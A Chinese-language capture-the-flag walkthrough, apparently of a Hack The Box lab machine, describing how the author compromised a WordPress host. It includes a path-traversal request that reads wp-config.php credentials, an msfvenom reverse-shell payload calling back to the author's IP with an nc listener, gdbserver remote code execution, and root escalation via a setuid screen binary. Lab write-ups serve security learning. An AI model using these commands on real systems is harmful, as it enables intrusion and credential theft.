0x01 前言#
靶機 IP:10.10.11.125。
本機 IP:10.10.16.21,mac m1。
0x02 簡單的資訊收集#
fscan 端口掃描只發現了 22、80 端口,nmap 掃描下,還發現一個 1337 端口,不確定這個端口是什麼作用的。
nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.125
wpsan 掃描出來的結果也沒啥可用的信息。
在 wordpress 的 wp-content 目錄下有個插件目錄,訪問http://10.10.11.125/wp-content/plugins/,有一個 php 文件和 eboo-download 目錄,以為 hello.php 是木馬文件,經分析發現不是木馬,ebook-download 既然在 plugins 目錄下且查看 readme.txt,確認是一個插件。
0x03 漏洞利用#
在https://www.exploit-db.com/ 網站上搜索 exp,發現有個目錄穿越漏洞。
poc 如下:
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================
下載 wp-config 文件。
http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
這個文件存放了數據庫的用戶名和密碼,嘗試登錄 wordpress 後台,無法登錄。
到這就沒啥思路了,看了下 wp,發現可以利用 1337 端口上的服務,直接 rce,1337 端口上運行著 gdbserver 服務,gdbserver 的滲透可參考:https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver,gdbserver 的利用腳本 url:https://www.exploit-db.com/exploits/50539。
漏洞利用流程:
1、先將 exp 下載到本地。
2、msfvenom 生成 shellcode。
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.21 LPORT=1234 PrependFork=true -o rev.bin
3、本地監聽
nc -lvp 1234
4、運行 exp
python3 gdbserver_exp.py 10.10.11.125:1337 rev.bin
升級交互式終端。
python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm-256color
還有一種探測目標服務器的運行了什麼服務的方法是利用 /proc/pid/cmdline 文件,在 proc 根目錄下,以數字命名的目錄表示當前一個運行的進程,目錄名為進程的 pid。
通過 burpsuite 遍歷 pid 然後枚舉目標服務器運行的服務。
0x04 提權#
查找以 root 用戶運行的具有 suid 的文件,有一個文件 /usr/bin/screen 存在 suid 設置。
find / -perm -4000 -type f 2>/dev/null
screen -x root/root
0x05 總結#
1、學習了如何結合任意文件讀取漏洞探測目標服務器上運行的服務,screen 提權等知識點。
參考:
https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver
https://zhuanlan.zhihu.com/p/437147174